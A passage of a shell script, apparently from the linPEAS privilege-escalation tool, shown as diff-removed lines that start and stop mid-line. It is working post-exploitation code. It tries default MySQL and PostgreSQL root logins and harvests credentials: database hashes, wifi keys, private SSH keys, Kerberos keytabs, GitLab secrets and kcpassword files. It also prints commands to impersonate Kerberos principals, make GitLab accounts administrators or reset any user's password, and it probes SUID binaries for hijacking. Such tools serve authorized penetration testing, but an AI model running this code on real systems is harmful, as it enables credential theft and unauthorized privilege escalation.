mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - #-- SI) Mysql connection root/NOPASS - mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) - print_list "MySQL connection using root/NOPASS ................. " - if [ "$mysqlconnectnopass" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - #-- SI) Mysql credentials - print_2title "Searching mysql credentials and exec" - if [ "$PSTORAGE_MYSQL" ]; then - printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do - for f in $(find $d -name debian.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," - cat "$f" - fi - done - for f in $(find $d -name user.MYD 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," - grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" - fi - done - for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do - if [ -r "$f" ]; then - u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - fi - done - for f in $(find $d -name my.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "Found readable $f" - grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," - fi - done - mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") - if [ "$mysqlexec" ]; then - echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," - fi - done - else echo_not_found - fi - echo "" - - peass{MariaDB} - - peass{PostgreSQL} - - #-- SI) PostgreSQL brute - if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. - #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this - print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - fi - - peass{Mongo} - - peass{Apache} - - peass{Tomcat} - - peass{FastCGI} - - peass{Http_conf} - - peass{Htpasswd} - - peass{PHP Sessions} - - peass{Wordpress} - - peass{Drupal} - - peass{Moodle} - - peass{Supervisord} - - peass{Cesi} - - peass{Rsync} - - peass{Hostapd} - - #-- SI) Wifi conns - print_2title "Searching wifi conns file" - wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) - if [ "$wifi" ]; then - printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done - else echo_not_found - fi - echo "" - - peass{Anaconda ks} - - peass{VNC} - - peass{Ldap} - - peass{OpenVPN} - - #-- SI) ssh files - print_2title "Searching ssl/ssh files" - if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi - sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" - hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" - hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" - - peass{SSH} - - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," - - if [ "$TIMEOUT" ]; then - privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) - privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) - privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) - privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) - else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) - fi - - if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - echo "" - print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi - echo "" - fi - if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then - print_3title "Some certificates were found (out limited):" - printf "$certsb4_grep\n" | head -n 20 - printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 - echo "" - fi - if [ "$PSTORAGE_CERTSCLIENT" ]; then - print_3title "Some client certificates were found:" - printf "$PSTORAGE_CERTSCLIENT\n" - echo "" - fi - if [ "$PSTORAGE_SSH_AGENTS" ]; then - print_3title "Some SSH Agent files were found:" - printf "$PSTORAGE_SSH_AGENTS\n" - echo "" - fi - if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then - print_3title "Listing SSH Agents" - ssh-add -l - echo "" - fi - if [ "$PSTORAGE_SSH_CONFIG" ]; then - print_3title "Some home ssh config file was found" - printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done - echo "" - fi - if [ "$hostsdenied" ]; then - print_3title "/etc/hosts.denied file found, read the rules:" - printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," - echo "" - fi - if [ "$hostsallow" ]; then - print_3title "/etc/hosts.allow file found, trying to read the rules:" - printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," - echo "" - fi - if [ "$sshconfig" ]; then - echo "" - echo "Searching inside /etc/ssh/ssh_config for interesting info" - grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," - fi - echo "" - - #-- SI) PAM auth - print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" - pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) - if [ "$pamssh" ]; then - grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - - #-- SI) NFS exports - print_2title "NFS exports?" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" - if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," - else echo_not_found "/etc/exports" - fi - echo "" - - #-- SI) Kerberos - print_2title "Searching kerberos conf files and tickets" - print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" - kadmin_exists="$(command -v kadmin)" - klist_exists="$(command -v klist)" - if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi - if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; - fi - - printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do - if [ -r "$f" ]; then - if echo "$f" | grep -q .k5login; then - echo ".k5login file (users with access to the user who has this file in his home)" - cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - elif echo "$f" | grep -q keytab; then - echo "" - echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" - klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do - if [ "$l" ] && echo "$l" | grep -q "@"; then - printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" - #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid - #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that - fi - done - elif echo "$f" | grep -q krb5.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; - elif echo "$f" | grep -q kadm5.acl; then - ls -l "$f" - cat "$f" 2>/dev/null - elif echo "$f" | grep -q sssd.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; - elif echo "$f" | grep -q secrets.ldb; then - echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - elif echo "$f" | grep -q .secrets.mkey; then - echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - fi - fi - done - ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" - klist 2>/dev/null || echo_not_found "klist" - echo "" - - peass{Knockd} - - peass{Kibana} - - peass{Elasticsearch} - - ##-- SI) Logstash - print_2title "Searching logstash files" - if [ "$PSTORAGE_LOGSTASH" ]; then - printf "$PSTORAGE_LOGSTASH\n" - printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do - if [ -r "$d/startup.options" ]; then - echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," - fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," - done - else echo_not_found - fi - echo "" - - #-- SI) Vault-ssh - print_2title "Searching Vault-ssh files" - if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then - printf "$PSTORAGE_VAULT_SSH_HELPER\n" - printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done - echo "" - vault secrets list 2>/dev/null - printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - else echo_not_found "vault-ssh-helper.hcl" - fi - echo "" - - #-- SI) Cached AD Hashes - adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) - print_2title "Searching AD cached hashes" - if [ "$adhashes" ]; then - ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null - else echo_not_found "cached hashes" - fi - echo "" - - #-- SI) Screen sessions - print_2title "Searching screen sessions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - screensess=$(screen -ls 2>/dev/null) - if [ "$screensess" ]; then - printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," - else echo_not_found "screen" - fi - echo "" - - #-- SI) Tmux sessions - tmuxdefsess=$(tmux ls 2>/dev/null) - tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) - print_2title "Searching tmux sessions"$N - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," - else echo_not_found "tmux" - fi - echo "" - - peass{CouchDB} - - peass{Redis} - - #-- SI) Dovecot - # Needs testing - print_2title "Searching dovecot files" - dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) - if [ -z "$dovecotpass" ]; then - echo_not_found "dovecot credentials" - else - for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do - df=$(echo $d |cut -d ':' -f1) - dp=$(echo $d |cut -d ':' -f2-) - echo "Found possible PLAIN text creds in $df" - echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - done - fi - echo "" - - peass{Mosquitto} - - peass{Neo4j} - - peass{Cloud Credentials} - - peass{Cloud Init} - - peass{CloudFlare} - - peass{Erlang} - - peass{GMV Auth} - - peass{IPSec} - - peass{IRSSI} - - peass{Keyring} - - peass{Filezilla} - - peass{Backup Manager} - - ##-- SI) passwd files (splunk) - print_2title "Searching uncommon passwd files (splunk)" - SPLUNK_BIN="$(command -v splunk 2>/dev/null)" - if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi - printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do - if [ -f "$f" ] && ! [ -x "$f" ]; then - echo "passwd file: $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," - fi - done - echo "" - - print_2title "Analyzing kcpassword files" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" - printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do - echo "$f" | sed -${E} "s,.*,${SED_RED}," - base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - done - echo "" - - ##-- SI) Gitlab - print_2title "Searching GitLab related files" - #Check gitlab-rails - if [ "$(command -v gitlab-rails)" ]; then - echo "gitlab-rails was found. Trying to dump users..." - gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," - echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" - echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" - echo "" - fi - if [ "$(command -v gitlab-backup)" ]; then - echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" - echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" - echo "" - fi - #Check gitlab files - printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do - if echo $f | grep -q secrets.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" - elif echo $f | grep -q gitlab.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -A 4 "repositories:" - elif echo $f | grep -q gitlab.rb; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," - fi - echo "" - done - echo "" - - peass{Github} - - peass{Svn} - - peass{PGP-GPG} - - peass{Cache Vi} - - peass{Wget} - - ##-- SI) containerd installed - print_2title "Checking if containerd(ctr) is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" - containerd=$(command -v ctr) - if [ "$containerd" ]; then - echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - ctr image list - fi - echo "" - - ##-- SI) runc installed - print_2title "Checking if runc is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" - runc=$(command -v runc) - if [ "$runc" ]; then - echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - fi - echo "" - - #-- SI) Docker - print_2title "Searching docker files (limit 70)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" - printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do - ls -l "$f" 2>/dev/null - if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then - echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - done - echo "" - - peass{Firefox} - - peass{Chrome} - - peass{Autologin} - - #-- SI) S/Key athentication - print_2title "S/Key authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then - printf "System supports$RED S/Key$NC authentication\n" - if ! [ -d /etc/skey/ ]; then - echo "${GREEN}S/Key authentication enabled, but has not been initialized" - elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then - echo "${RED}/etc/skey/ is writable by you" - ls -ld /etc/skey/ - else - ls -ld /etc/skey/ 2>/dev/null - fi - fi - echo "" - - #-- SI) YubiKey athentication - print_2title "YubiKey authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then - printf "System supports$RED YubiKey$NC authentication\n" - if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then - echo "${RED}/var/db/yubikey/ is writable by you" - ls -ld /var/db/yubikey/ - else - ls -ld /var/db/yubikey/ 2>/dev/null - fi - fi - echo "" - - #-- SI) Passwords inside pam.d - print_2title "Passwords inside pam.d" - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," - echo "" - - - - peass{SNMP} - - peass{Pypirc} - - peass{Postfix} - - peass{Ldaprc} - - peass{Env} - - peass{Msmtprc} - - peass{Keepass} - - peass{FTP} - - peass{EXTRA_SECTIONS} - - peass{Interesting logs} - - peass{Windows Files} - - peass{Other Interesting Files} - - echo "" - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q IntFiles; then - ########################################### - #----------) Interesting files (----------# - ########################################### - print_title "Interesting Files" - - ##-- IF) SUID - print_2title "SUID - Check easy privesc, exploits and write perms" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - if ! [ "$STRINGS" ]; then - echo_not_found "strings" - fi - if ! [ "$STRACE" ]; then - echo_not_found "strace" - fi - suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $suids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total"; then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo $s | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="$(echo "$sline" | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then - printf $ITALIC - echo "----------------------------------------------------------------------------------------" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH - export LD_LIBRARY_PATH="" - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf $NC - export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH - echo "----------------------------------------------------------------------------------------" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - - ##-- IF) SGID - print_2title "SGID" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $sgids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total";then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf "$ITALIC" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf "$NC" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - ##-- IF) Misconfigured ld.so - print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi - done - echo "" - - ##-- IF) Capabilities - print_2title "Capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - echo "Current capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} 